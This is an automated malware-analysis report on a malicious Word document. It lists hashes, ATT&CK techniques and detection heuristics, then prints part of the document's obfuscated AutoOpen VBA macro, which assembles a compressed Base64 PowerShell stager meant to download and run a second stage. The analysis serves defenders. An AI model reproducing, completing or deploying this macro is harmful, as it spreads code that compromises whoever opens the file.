Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f86bed6d96426e59…

MALICIOUS

Office (OLE)

100.0 KB Created: 2018-05-23 10:37:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 4b50c1d42ee597a1bfad164646211e39 SHA-1: c9024856bbca67c308154923132756c7f5fb1bbc SHA-256: f86bed6d96426e597d251d702068eac155c2ef005e7c1b58976270574dcdc2c2
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call to execute a PowerShell command. The script attempts to construct a PowerShell command by concatenating various strings, indicating an effort to obfuscate the payload. The primary function of the script appears to be downloading and executing a second-stage payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71556 bytes
SHA-256: a8d7c3c7f6d2084271d1d1a3be23c956407d6bcfe3e02c5b5ef4b1c44af896c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NLmQmSGElHV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tBhuH()

On Error Resume Next
NXnsHEQTsh = IcvRwbO + CSng(941024) + 776689 / Sin(545306 - CByte(588203) / 353589 - Round(941024)) + zqwJZzosMcb * wpVVfmk - (776689 + 545306 + 588203 - 9410240)
Set kMLaZhjclI = qWqEvOONt
zhfdL = "bYD7owershell (NEomCgGbg6wlNWhRHPkXndblew-oBJecT iOeIkyKxX1ojfx3Un4DxjTd"
iDsfJwBN = Left(Right(zhfdL, 68), 12) + Left(Right(zhfdL, 33), 12)

ZCYnzDYwab = "bY.stREaMw4TyVW7EomCgrEaderNWhRHPkXndbl"
DjDYONtPAS = Left(Right(ZCYnzDYwab, 37), 7) + Left(Right(ZCYnzDYwab, 18), 6)

qoKjNf = "bY( (New-w4TyVW7EomCgoBJecTNWhRHPkXndbl"
kMUmLX = Left(Right(qoKjNf, 37), 7) + Left(Right(qoKjNf, 18), 6)

wnTbk = "bYD7k iO.comprEsSiOngGbg6wlNWhRHPkXndbljHOAB3l7GVH.DeflATESTreaM( 4DxjTd23vH6PcKoVrFxmyemCp6a"
IEmjLfFhVH = CStr(Left(Right(wnTbk, 88), 15)) + Left(Right(wnTbk, 43), 16)
FTlGsICWV = ShrlKajX + CSng(712213) + 2908 / Sin(699909 - CByte(642161) / 125683 - Round(712213)) + bnfWadQwV * snOKmBmocsr - (2908 + 699909 + 642161 - 7122130)
Set KkSdjBWGN = UHuwazKcc
Vncphf = "bYD7[SyStEM.iO.7EomCgGbg6wlNWhRHPkXndmEmorystREamHkeIkyKxX1ojfx3Un4Dx"
cGowmDfU = Left(Right(Vncphf, 65), 11) + Left(Right(Vncphf, 32), 12)

OUIJDoGNaO = "bYD7k] [cONVeRT]::FroGbg6wlNWhRHPkXndbljHOAB3l7GVHkeImBAsE64stRINg('XVTd23vH6PcKoVrFxmyemCp6axzcR6g"
oTLbjL = CStr(Left(Right(OUIJDoGNaO, 94), 16)) + Left(Right(OUIJDoGNaO, 46), 17)

PmwRwbBqm = "bYD7kbbbiJHEH2PlH8Y7YGbg6wlNWhRHPkXndbljHOAB3l7GVHkeINhltvcmVkrkgl4ZSeTd23vH6PcKoVrFxmyemCp6axzcR6g"
BItVtGJu = CStr(Left(Right(PmwRwbBqm, 94), 16)) + Left(Right(PmwRwbBqm, 46), 17)

CZpDLwlZjCC = "bYDG3XARdiw/yVW7EomCgGbg6wlNWhjIdxYLkaWFHOAB3l7GVHkeIkyKx"
KZiNmt = Left(Right(CZpDLwlZjCC, 54), 9) + CStr(Left(Right(CZpDLwlZjCC, 27), 10))
qLBhW = uobizHYvMuJ + CSng(179040) + 155196 / Sin(692027 - CByte(241113) / 553143 - Round(179040)) + DrofAzRh * GnBzqw - (155196 + 692027 + 241113 - 1790400)
Set CvPknLpXB = aUABbZz
BzHFJBBmPk = Chr(43)
FVjQqa = "Eeb"
tsFIXYOjkzW = Left(Right(FVjQqa, 3), 1)

oGQFzS = Chr(43)
zowioK = "bYD7kPec0901OHkYurq6gGbg6wlNWhRHPkXndbljHOAB3l7GVHurq76tQprDOrXH5J4DxjTd23vH6PcKoVrFxmyemCp6a"
jTEkUcaTv = CStr(Left(Right(zowioK, 88), 15)) + Left(Right(zowioK, 43), 16)
twEUiBcoIlf = FSJMHGJSMpN + CSng(313578) + 972209 / Sin(433559 - CByte(883336) / 512607 - Round(313578)) + rQuOR * pnHTCiTWhzu - (972209 + 433559 + 883336 - 3135780)
Set RGNcL = vajZfAn
OEUbR = Chr(43)
izzjX = "9fD7kUp4lw4T"
WJjXDDYts = CStr(Left(Right(izzjX, 12), 2)) + Left(Right(izzjX, 6), 2)

IpPuTtwjzP = Chr(43)
NkuPopFjM = "bYLSKn3uTw4TyVW7EomCgrafS3ZNWhRHPkXndbl"
BQmPlvkiho = Left(Right(NkuPopFjM, 37), 7) + Left(Right(NkuPopFjM, 18), 6)

McvkzMqkE = "bYD7kU9lXYv7/2q61a9h9ofg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyK61mvVLLLsCx/OrjJ8evH6PcKoVrFxmyemCp6axzcR6gGhtImn"
NJOZhSSsr = CStr(Left(Right(McvkzMqkE, 99), 17)) + CStr(Left(Right(McvkzMqkE, 49), 18))

VWnuTCEDPr = "bYD7kA2jwePX3g8BMdD6OGbg6wlNWhRHPkXndbljHOAB3l7GVHkeCD6MeYYtnD53MeYQxjTd23vH6PcKoVrFxmyemCp6axzc"
KNsaE = Left(Right(VWnuTCEDPr, 91), 16) + Left(Right(VWnuTCEDPr, 44), 16)

SjwKDXrIlr = "bY4dLH18Ac4TyVW7EomCgGbgxcqCIfcHPkXndbljHOAB3"
nUHobBp = Left(Right(SjwKDXrIlr, 43), 8) + CStr(Left(Right(SjwKDXrIlr, 21), 7))
rqCuojiz = aAHMTt + CSng(151576) + 351934 / Sin(148908 - CByte(756253) / 206471 - Round(151576)) + nKAkEpzKS * zltHcZVczir - (351934 + 148908 + 756253 - 1515760)
Set TlcqwkCSOmm = ZUNWUB
AFiWZQau = Chr(43)
OJtwnpmAwWP = "bY94oDUGzw4TyVW7EomCgvC5/DDNWhRHPkXndbl"
iKLraCUv = Left(Right(OJtwnpmAwWP, 37), 7) + Left(Right(OJtwnpmAwWP, 18), 6)

uVDbJbsM = "FPD7kg2Tl"
lNrhBfKFaE = Left(Right(uVDbJbsM, 9), 2) + CStr(Left(Right(uVDbJbsM, 4), 1))

QSUoi = Chr(43)
EDBmNNcF = "bYD7kUGPv26UMHKhz/sC6mCg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyKnwgjLDxugEWAJe6DocvH6PcKoVrFxmyemCp6axzcR6gGhtImn"
WpwCuaHwFGN = CStr(Left(Right(E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.